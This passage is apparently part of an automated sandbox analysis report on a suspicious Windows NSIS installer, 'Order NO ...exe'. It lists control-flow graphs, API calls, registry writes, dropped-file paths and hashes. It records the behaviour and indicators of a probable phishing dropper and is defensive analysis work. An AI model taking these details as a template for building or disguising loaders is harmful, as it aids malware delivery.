                                                  • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Premolder\Mokl$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-3435433539
                                                  • Opcode ID: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                  • Instruction ID: c4c704bd5297fd73affe36db923882850e9d0fe41f98d1713f1e709c6875f219
                                                  • Opcode Fuzzy Hash: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                  • Instruction Fuzzy Hash: E061C670240701BAD620AB66AD46F2B3A7CEB85745F41453FF941B22E2DF7D5D02CA2D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 225 4030f5-403143 GetTickCount GetModuleFileNameW call 406192 228 403145-40314a 225->228 229 40314f-40317d call 4066a2 call 405fbd call 4066a2 GetFileSize 225->229 230 40338f-403393 228->230 237 403183 229->237 238 403268-403276 call 403053 229->238 239 403188-40319f 237->239 244 403347-40334c 238->244 245 40327c-40327f 238->245 242 4031a1 239->242 243 4031a3-4031ac call 403607 239->243 242->243 251 4031b2-4031b9 243->251 252 403303-40330b call 403053 243->252 244->230 247 403281-403299 call 40361d call 403607 245->247 248 4032ab-4032f7 GlobalAlloc call 406bf1 call 4061c1 CreateFileW 245->248 247->244 271 40329f-4032a5 247->271 276 4032f9-4032fe 248->276 277 40330d-40333d call 40361d call 403396 248->277 255 403235-403239 251->255 256 4031bb-4031cf call 40614d 251->256 252->244 261 403243-403249 255->261 262 40323b-403242 call 403053 255->262 256->261 274 4031d1-4031d8 256->274 267 403258-403260 261->267 268 40324b-403255 call 406b83 261->268 262->261 267->239 275 403266 267->275 268->267 271->244 271->248 274->261 280 4031da-4031e1 274->280 275->238 276->230 285 403342-403345 277->285 280->261 282 4031e3-4031ea 280->282 282->261 284 4031ec-4031f3 282->284 284->261 286 4031f5-403215 284->286 285->244 288 40334e-40335f 285->288 286->244 287 40321b-40321f 286->287 289 403221-403225 287->289 290 403227-40322f 287->290 291 403361 288->291 292 403367-40336c 288->292 289->275 289->290 290->261 293 403231-403233 290->293 291->292 294 40336d-403373 292->294 293->261 294->294 295 403375-40338d call 40614d 294->295 295->230
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403109
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,00000400), ref: 00403125
                                                    • Part of subcall function 00406192: GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,80000000,00000003), ref: 00406196
                                                    • Part of subcall function 00406192: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,80000000,00000003), ref: 0040316E
                                                  • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 004032B0
                                                  Strings
                                                  • C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe, xrefs: 0040310F, 0040311E, 00403132, 0040314F
                                                  • Null, xrefs: 004031EC
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
                                                  • "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe", xrefs: 004030FE
                                                  • Inst, xrefs: 004031DA
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
                                                  • soft, xrefs: 004031E3
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004030FF, 004032C8
                                                  • C:\Users\user\Desktop, xrefs: 00403150, 00403155, 0040315B
                                                  • Error launching installer, xrefs: 00403145
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-1177449427
                                                  • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                  • Instruction ID: 4d59aa34fe8aef517225e0e03f455ac639a07fb2fd098cfe03fbce1fe051b31e
                                                  • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                  • Instruction Fuzzy Hash: 4671D071A00204ABDB20DFA4DD86BAE3EACAB04715F20457FE915B72C1CB789F418B5C

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 519 4066df-4066e8 520 4066ea-4066f9 519->520 521 4066fb-406715 519->521 520->521 522 406925-40692b 521->522 523 40671b-406727 521->523 524 406931-40693e 522->524 525 406739-406746 522->525 523->522 526 40672d-406734 523->526 528 406940-406945 call 4066a2 524->528 529 40694a-40694d 524->529 525->524 527 40674c-406755 525->527 526->522 530 406912 527->530 531 40675b-40679e 527->531 528->529 533 406920-406923 530->533 534 406914-40691e 530->534 535 4067a4-4067b0 531->535 536 4068b6-4068ba 531->536 533->522 534->522 537 4067b2 535->537 538 4067ba-4067bc 535->538 539 4068bc-4068c3 536->539 540 4068ee-4068f2 536->540 537->538 543 4067f6-4067f9 538->543 544 4067be-4067e4 call 406570 538->544 541 4068d3-4068df call 4066a2 539->541 542 4068c5-4068d1 call 4065e9 539->542 545 406902-406910 lstrlenW 540->545 546 4068f4-4068fd call 4066df 540->546 555 4068e4-4068ea 541->555 542->555 550 4067fb-406807 GetSystemDirectoryW 543->550 551 40680c-40680f 543->551 560 4067ea-4067f1 call 4066df 544->560 561 40689e-4068a1 544->561 545->522 546->545 556 406899-40689c 550->556 557 406821-406825 551->557 558 406811-40681d GetWindowsDirectoryW 551->558 555->545 562 4068ec 555->562 556->561 563 4068ae-4068b4 call 406950 556->563 557->556 559 406827-406845 557->559 558->557 565 406847-40684d 559->565 566 406859-406871 call 406a96 559->566 560->556 561->563 568 4068a3-4068a9 lstrcatW 561->568 562->563 563->545 572 406855-406857 565->572 576 406873-406886 SHGetPathFromIDListW CoTaskMemFree 566->576 577 406888-406891 566->577 568->563 572->566 574 406893-406897 572->574 574->556 576->574 576->577 577->559 577->574
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406801
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                  • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406875
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                  • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$]X
                                                  • API String ID: 4024019347-1703807387
                                                  • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction ID: c05bc8db6a500faa8ceae89892d654845b9b7d80f8daaf315b7a9d2c48b59061
                                                  • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                  • Instruction Fuzzy Hash: CE6147B2A053019BEB20AF24DC84B6B77D8AF54314F26453FF587B26D0DA3C8961875E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 642 401794-4017b9 call 402dcb call 405fe8 647 4017c3-4017d5 call 4066a2 call 405f71 lstrcatW 642->647 648 4017bb-4017c1 call 4066a2 642->648 653 4017da-4017db call 406950 647->653 648->653 657 4017e0-4017e4 653->657 658 4017e6-4017f0 call 4069ff 657->658 659 401817-40181a 657->659 666 401802-401814 658->666 667 4017f2-401800 CompareFileTime 658->667 661 401822-40183e call 406192 659->661 662 40181c-40181d call 40616d 659->662 669 401840-401843 661->669 670 4018b2-4018db call 405727 call 403396 661->670 662->661 666->659 667->666 672 401894-40189e call 405727 669->672 673 401845-401883 call 4066a2 * 2 call 4066df call 4066a2 call 405d02 669->673 683 4018e3-4018ef SetFileTime 670->683 684 4018dd-4018e1 670->684 685 4018a7-4018ad 672->685 673->657 704 401889-40188a 673->704 687 4018f5-401900 CloseHandle 683->687 684->683 684->687 688 402c58 685->688 690 401906-401909 687->690 691 402c4f-402c52 687->691 692 402c5a-402c5e 688->692 694 40190b-40191c call 4066df lstrcatW 690->694 695 40191e-401921 call 4066df 690->695 691->688 701 401926-4023bd 694->701 695->701 705 4023c2-4023c7 701->705 706 4023bd call 405d02 701->706 704->685 707 40188c-40188d 704->707 705->692 706->705 707->672
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Premolder\Mokl,?,?,00000031), ref: 004017D5
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Premolder\Mokl,?,?,00000031), ref: 004017FA
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,Caecias Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                    • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                    • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                    • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                    • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp$C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp\System.dll$C:\Users\user\AppData\Roaming\Premolder\Mokl$Call
                                                  • API String ID: 1941528284-724340396
                                                  • Opcode ID: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                  • Instruction ID: adf8bb8e975ebc770d7c27afbe064fe35cfd0cbf1071ecc95f96a86e7a4b9e55
                                                  • Opcode Fuzzy Hash: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                  • Instruction Fuzzy Hash: 8A41C671900105BACF117BA5CD85DAE3A79EF45368F21823FF422B10E1D73D8E91AA2D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 708 402711-40272a call 402da9 711 402730-402737 708->711 712 402c4f-402c52 708->712 714 402739 711->714 715 40273c-40273f 711->715 713 402c58-402c5e 712->713 714->715 716 4028a3-4028ab 715->716 717 402745-402754 call 406602 715->717 716->712 717->716 721 40275a 717->721 722 402760-402764 721->722 723 4027f9-4027fc 722->723 724 40276a-402785 ReadFile 722->724 726 402814-402824 call 406215 723->726 727 4027fe-402801 723->727 724->716 725 40278b-402790 724->725 725->716 730 402796-4027a4 725->730 726->716 736 402826 726->736 727->726 728 402803-40280e call 406273 727->728 728->716 728->726 733 4027aa-4027bc MultiByteToWideChar 730->733 734 40285f-40286b call 4065e9 730->734 733->736 737 4027be-4027c1 733->737 734->713 739 402829-40282c 736->739 740 4027c3-4027ce 737->740 739->734 742 40282e-402833 739->742 740->739 743 4027d0-4027f5 SetFilePointer MultiByteToWideChar 740->743 744 402870-402874 742->744 745 402835-40283a 742->745 743->740 746 4027f7 743->746 747 402891-40289d SetFilePointer 744->747 748 402876-40287a 744->748 745->744 749 40283c-40284f 745->749 746->736 747->716 750 402882-40288f 748->750 751 40287c-402880 748->751 749->716 752 402851-402857 749->752 750->716 751->747 751->750 752->722 753 40285d 752->753 753->716
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                    • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: f4cc411d6a691ff0d779ee2962e3d04b2c777b5052aec2b7df3f44af6f7597f5
                                                  • Instruction ID: 77fbecb4268093b3ffff8c623a80bd5bb6512b600f7762490a4bde5bc174ce64
                                                  • Opcode Fuzzy Hash: f4cc411d6a691ff0d779ee2962e3d04b2c777b5052aec2b7df3f44af6f7597f5
                                                  • Instruction Fuzzy Hash: 9A511D75D04219AADF20EFD4CA85AAEBB79FF44304F14817BE501B62D0D7B89D82CB58

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 754 406a26-406a46 GetSystemDirectoryW 755 406a48 754->755 756 406a4a-406a4c 754->756 755->756 757 406a5d-406a5f 756->757 758 406a4e-406a57 756->758 760 406a60-406a93 wsprintfW LoadLibraryExW 757->760 758->757 759 406a59-406a5b 758->759 759->760
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                  • wsprintfW.USER32 ref: 00406A78
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME
                                                  • API String ID: 2200240437-1106614640
                                                  • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                  • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 761 74331817-74331856 call 74331bff 765 74331976-74331978 761->765 766 7433185c-74331860 761->766 767 74331862-74331868 call 7433243e 766->767 768 74331869-74331876 call 74332480 766->768 767->768 773 743318a6-743318ad 768->773 774 74331878-7433187d 768->774 777 743318af-743318cb call 74332655 call 74331654 call 74331312 GlobalFree 773->777 778 743318cd-743318d1 773->778 775 74331898-7433189b 774->775 776 7433187f-74331880 774->776 775->773 784 7433189d-7433189e call 74332e23 775->784 780 74331882-74331883 776->780 781 74331888-74331889 call 74332b98 776->781 802 74331925-74331929 777->802 782 743318d3-7433191c call 74331666 call 74332655 778->782 783 7433191e-74331924 call 74332655 778->783 786 74331890-74331896 call 74332810 780->786 787 74331885-74331886 780->787 793 7433188e 781->793 782->802 783->802 796 743318a3 784->796 801 743318a5 786->801 787->773 787->781 793->796 796->801 801->773 803 74331966-7433196d 802->803 804 7433192b-74331939 call 74332618 802->804 803->765 809 7433196f-74331970 GlobalFree 803->809 811 74331951-74331958 804->811 812 7433193b-7433193e 804->812 809->765 811->803 814 7433195a-74331965 call 743315dd 811->814 812->811 813 74331940-74331948 812->813 813->811 815 7433194a-7433194b FreeLibrary 813->815 814->803 815->811
                                                  APIs
                                                    • Part of subcall function 74331BFF: GlobalFree.KERNEL32(?), ref: 74331E74
                                                    • Part of subcall function 74331BFF: GlobalFree.KERNEL32(?), ref: 74331E79
                                                    • Part of subcall function 74331BFF: GlobalFree.KERNEL32(?), ref: 74331E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 743318C5
                                                  • FreeLibrary.KERNEL32(?), ref: 7433194B
                                                  • GlobalFree.KERNEL32(00000000), ref: 74331970
                                                    • Part of subcall function 7433243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7433246F
                                                    • Part of subcall function 74332810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,74331896,00000000), ref: 743328E0
                                                    • Part of subcall function 74331666: wsprintfW.USER32 ref: 74331694
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2450202966.0000000074331000.00000020.00000001.01000000.00000004.sdmp, Offset: 74330000, based on PE: true
                                                  • Associated: 00000000.00000002.2450137817.0000000074330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450226719.0000000074334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450276795.0000000074336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_74330000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: 7ab912a1b57ef5bf487f566912fa9575d747eed2432957a1a23dcb09e2a5aa96
                                                  • Instruction ID: c9bfe8510d34a4afccc0893f9d42be8e27cc3a3add99d507b68317af88227287
                                                  • Opcode Fuzzy Hash: 7ab912a1b57ef5bf487f566912fa9575d747eed2432957a1a23dcb09e2a5aa96
                                                  • Instruction Fuzzy Hash: 4A41A072A002059BEF019F65D988FD537ACEF08314F944469ED4E9E08ADBB8D385CBA0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 818 4024af-4024e0 call 402dcb * 2 call 402e5b 825 4024e6-4024f0 818->825 826 402c4f-402c5e 818->826 828 4024f2-4024ff call 402dcb lstrlenW 825->828 829 402503-402506 825->829 828->829 830 402508-402519 call 402da9 829->830 831 40251a-40251d 829->831 830->831 835 40252e-402542 RegSetValueExW 831->835 836 40251f-402529 call 403396 831->836 840 402544 835->840 841 402547-402628 RegCloseKey 835->841 836->835 840->841 841->826
                                                  APIs
                                                  • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,00000023,00000011,00000002), ref: 004024FA
                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,00000000,00000011,00000002), ref: 0040253A
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,00000000,00000011,00000002), ref: 00402622
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
